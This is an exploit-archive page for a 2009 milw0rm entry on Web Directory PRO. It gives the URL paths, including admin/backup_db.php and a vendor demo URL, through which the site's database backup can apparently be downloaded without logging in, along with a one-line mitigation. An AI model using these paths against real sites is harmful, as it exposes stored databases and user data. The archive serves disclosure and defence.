header-logo
Suggest Exploit
vendor:
Web Directory PRO
by:
TiGeR-Dz
7,5
CVSS
HIGH
Remote Database Backup Vulnerability
264
CWE
Product Name: Web Directory PRO
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Web Directory PRO Remote Database Backup Vulnerability

A vulnerability in Web Directory PRO allows an attacker to download the database backup without authentication.

Mitigation:

Ensure that the application is configured to require authentication before allowing access to the database backup.
Source

Exploit-DB raw data:

 ---------------------------------------------------------------
 Web Directory PRO Remote Database Backup Vulnerability
 ---------------------------------------------------------------
 Founder :TiGeR-Dz
 Home:http://www.h4ckf0ru.com
 Script:Web Directory PRO 
 Download:http://www.phpwebdirectoryscript.com/
 Note: in sha alah sanantasire a la misre  you ekahade :)
 ---------------------------------------------------------------
 Exploit
 -------
 www.site.com/[path]/admin/login.php

 go to Download Backup 

 www.site.com/[path]/admin/backup_db.php
 
 booooooooooooommmmmmmmmm the Backup is download :)
 
 
 ----------------------------------------------------------------
 Dem0
 ---------
 http://demo-web-directory-pro.phpwebdirectoryscript.com/admin/login.php

 go to Download Backup 
 
 http://demo-web-directory-pro.phpwebdirectoryscript.com/admin/backup_db.php
booooooooooooommmmmmmmmm the Backup is download :)

--------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------

# milw0rm.com [2009-06-04]

Navigation

Suggest Exploit

Services By CQR